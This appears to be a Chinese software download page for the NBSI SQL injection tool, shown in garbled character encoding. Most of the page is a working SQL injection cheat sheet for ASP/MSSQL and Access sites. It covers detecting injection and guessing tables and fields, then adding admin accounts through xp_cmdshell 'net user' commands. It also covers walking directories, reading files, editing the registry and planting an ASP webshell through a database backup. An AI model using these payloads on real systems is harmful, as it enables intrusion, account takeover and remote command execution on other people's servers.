網(wǎng)站安全檢測(cè)入侵工具下載 最新更新|軟件分類(lèi)|軟件專(zhuān)題|手機(jī)版|論壇轉(zhuǎn)貼|軟件發(fā)布

您當(dāng)前所在位置:首頁(yè)安全相關(guān)系統(tǒng)安全 → NBSI注入漏洞檢測(cè)工具 v3.0.1 綠色中文版

NBSI注入漏洞檢測(cè)工具

v3.0.1 綠色中文版

NBSI注入漏洞檢測(cè)工具
  • 軟件大。119KB
  • 軟件語(yǔ)言:中文
  • 軟件類(lèi)型:國(guó)產(chǎn)軟件 / 系統(tǒng)安全
  • 軟件授權(quán):免費(fèi)軟件
  • 更新時(shí)間:2018-11-08 18:41
  • 軟件等級(jí):4星
  • 應(yīng)用平臺(tái):WinXP
  • 軟件官網(wǎng):

ITMOP本地下載文件大。119KB

點(diǎn)贊好評(píng)0%(0) 差評(píng)差評(píng)0%(0)

軟件介紹人氣軟件精品推薦相關(guān)文章網(wǎng)友評(píng)論下載地址

小編為您推薦:NBSISQL注入工具

NBSI注入漏洞檢測(cè)工具是一款功能強(qiáng)大的軟件,由vb語(yǔ)言編寫(xiě)的網(wǎng)站漏洞檢測(cè)工具的名稱(chēng),ASP注入漏洞檢測(cè)工具,特別在sql server注入檢測(cè)方面有極高的準(zhǔn)確率。

NBSI介紹

1.判斷是否有注入

;and 1=1

;and 1=2

2.初步判斷是否是mssql

;and user>0

3.判斷數(shù)據(jù)庫(kù)系統(tǒng)

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

4.注入?yún)?shù)是字符

'and [查詢(xún)條件] and ''='

5.搜索時(shí)沒(méi)過(guò)濾參數(shù)的

'and [查詢(xún)條件] and '%25'='

6.猜數(shù)據(jù)庫(kù)

;and (Select Count(*) from [數(shù)據(jù)庫(kù)名])>0

7.猜字段

;and (Select Count(字段名) from 數(shù)據(jù)庫(kù)名)>0

8.猜字段中記錄長(zhǎng)度

;and (select top 1 len(字段名) from 數(shù)據(jù)庫(kù)名)>0

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 數(shù)據(jù)庫(kù)名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 數(shù)據(jù)庫(kù)名)>0

10.測(cè)試權(quán)限結(jié)構(gòu)(mssql)

;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(SELECT IS_MEMBER('db_owner'));--

11.添加mssql和系統(tǒng)的帳戶(hù)

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell 'net user username

password /workstations:* /times:all

/passwordchg:yes /passwordreq:yes /active:yes /add'

;--

;exec master.dbo.xp_cmdshell 'net user username

password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup

administrators username /add';--

12.(1)遍歷目錄

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree 'c:\'

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not

in('上步得到的paths'))>)

(2)遍歷目錄

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 獲得當(dāng)前所有驅(qū)動(dòng)器

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 獲得子目錄列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 獲得所有子目錄的目錄樹(shù)結(jié)構(gòu)

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的內(nèi)容

13.mssql中的存儲(chǔ)過(guò)程

xp_regenumvalues 注冊(cè)表根鍵, 子鍵

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多個(gè)記錄集方式返回所有鍵值

xp_regread 根鍵,子鍵,鍵值名

;exec xp_regread 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion',

'CommonFilesDir' 返回制定鍵的值

xp_regwrite 根鍵,子鍵, 值名, 值類(lèi)型, 值

值類(lèi)型有2種REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion',

'TestValueName','reg_sz','hello' 寫(xiě)入注冊(cè)表

xp_regdeletevalue 根鍵,子鍵,值名

exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion',

'TestValueName' 刪除某個(gè)值

xp_regdeletekey 'HKEY_LOCAL_MACHINE',

'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 刪除鍵,包括該鍵下所有值

14.mssql的backup創(chuàng)建webshell

use model

create table cmd(str image);

insert into cmd(str) values ('<% Dim oScript %>');

backup database model to disk='c:\l.asp';

15.mssql內(nèi)置函數(shù)

;and (select @@version)>0 獲得Windows的版本號(hào)

;and user_name()='dbo' 判斷當(dāng)前系統(tǒng)的連接用戶(hù)是不是sa

;and (select user_name())>0 爆當(dāng)前系統(tǒng)的連接用戶(hù)

;and (select db_name())>0 得到當(dāng)前連接的數(shù)據(jù)庫(kù)

16.簡(jiǎn)潔的webshell

use model

create table cmd(str image);

insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');

backup database model to disk='g:\wwwtest\l.asp';

請(qǐng)求的時(shí)候,像這樣子用:

https://ip/l.asp?c=dir

解壓密碼:ygkjgt7.cn

更多>>軟件截圖

推薦軟件

其他版本下載

    精品推薦sql注入工具漏洞掃描工具

    sql注入工具
    更多 (9個(gè)) >>sql注入工具SQL注入工具是一系列可以幫助用戶(hù)們進(jìn)行SQL注入的軟件工具,SQL注入是指通過(guò)把SQL命令插入到Web表單遞交或輸入域名或頁(yè)面請(qǐng)求的查詢(xún)字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令,致使非法數(shù)據(jù)侵入系統(tǒng).由于SQL注入利用
    漏洞掃描工具
    更多 (32個(gè)) >>漏洞掃描工具漏洞掃描工具是與網(wǎng)絡(luò)信息安全工作息息相關(guān)相關(guān)的重要防護(hù)軟件,一般分為web漏洞掃描器、java漏洞掃描工具、網(wǎng)站漏洞掃描工具、漏洞掃描系統(tǒng)、asp漏洞掃描軟件等幾個(gè)大類(lèi),無(wú)論是對(duì)于網(wǎng)絡(luò)相關(guān)從業(yè)者還是日常網(wǎng)絡(luò)使用

    相關(guān)文章

    下載地址

    • NBSI注入漏洞檢測(cè)工具 v3.0.1 綠色中文版

    查看所有評(píng)論>>網(wǎng)友評(píng)論

    發(fā)表評(píng)論

    (您的評(píng)論需要經(jīng)過(guò)審核才能顯示) 網(wǎng)友粉絲QQ群號(hào):203046401

    查看所有0條評(píng)論>>

    更多>>猜你喜歡